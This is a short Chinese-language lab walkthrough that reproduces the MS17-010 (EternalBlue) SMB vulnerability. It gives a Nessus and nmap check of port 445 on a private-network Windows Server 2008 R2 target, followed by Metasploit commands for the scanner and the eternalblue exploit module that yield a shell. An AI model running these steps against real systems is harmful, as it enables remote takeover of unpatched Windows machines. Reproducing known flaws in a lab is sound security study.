MS17-010

漏洞原理

        永恒之蓝（EternalBlue）是美国国家安全局（NSA）开发的漏洞利用程序，于2017年4月14日被黑客组织Shadow Brokers泄漏。该工具通过445/TCP和139端口来利用SMB协议远程代码执行漏洞（MS17-010）对Windows系统进行攻击。可用于对个人计算机和服务器植入木马、挖矿病毒、勒索软件等恶意程序。只要用户主机开机联网，即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。

影响版本

 目前已知受影响的 Windows 版本包括但不限于：WindowsNT，Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8，Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

实验环境：

        攻击机：kali-linux-2021.3       （192.168.11.205）

        靶机：Windows server 2008 R2  （192.168.11.242）

攻击过程

1.通过Nessus扫描得到报告显示，该服务器存在MS17-010。接下来进行漏洞复现

使用nmap扫描主机

 可以看到靶机开放了445端口

进入msfconsole

用MS17-010搜索

search MS17-010

 3：模块是漏洞发现模块RCE，0：漏洞利用模块

两个配合着使用

先用漏洞发现模块发现漏洞

 

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.11.242                  # 靶机IP
run

出现这行字表示发现漏洞

用漏洞利用模块拿到靶机shell

进入模块

use exploit/windows/smb/ms17_010_eternalblue
show options     # 查看参数
set rhost 192.168.11.242  # 设置靶机IP
run

拿到靶机shell

 

漏洞利用